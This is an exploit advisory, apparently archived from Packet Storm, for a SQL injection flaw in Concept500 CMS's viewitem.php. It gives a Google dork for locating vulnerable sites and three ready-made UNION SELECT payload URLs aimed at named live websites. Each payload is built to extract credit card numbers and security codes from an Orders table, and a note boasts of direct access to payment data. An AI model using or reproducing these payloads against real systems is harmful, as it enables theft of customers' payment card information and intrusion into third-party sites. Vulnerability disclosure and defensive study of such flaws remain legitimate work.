Concept500 CMS suffers from a remote SQL injection vulnerability.
d29bbeb60e5a6b83353c751f2e749a8c747bad2ded27d2553e7c54b65e631495# Exploit Title: Concept500 CMS SQL Injection Vulnerability
# Google Dork: [inurl : inurl:viewItem.php?id= ]
# Date: 2011-07-08
# Author: Sepehr Security Team
# Discovered By: H3X
# Software Site: https://www.concept500.co.uk/
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Expl0it :]
https://www.[sitename].com/viewitem.php?id=[SQL Injection]
[DEMO:]
1 ) https://www.mycommissionbid.com/bid/viewitem.php?id=-487+union+select+1,group_concat%28SecurityNo,0x3a,CardNo%29,3,4,5,6,7,8,9,10,11+from+Orders--
2) https://www.historicflyingclothing.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
3) https://www.hiscoll.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
and more ...
[Note :]
with this vulnerability you can get direct access to payment information same as paypal and other card information on database.
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Spc. Thanks :]
thE_Knight | Einstein | W!z4rd | Naboodgar | CONS7ANTINE | Mr.Amir-Masoud| nImaarek | GrEEn-ErRor | Net.Plus | Cruel
All Sepehr Sceurity Team Members And All Iranian Hack3rs
[Home Page :]
wWw.Sepehr-Team.orG
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed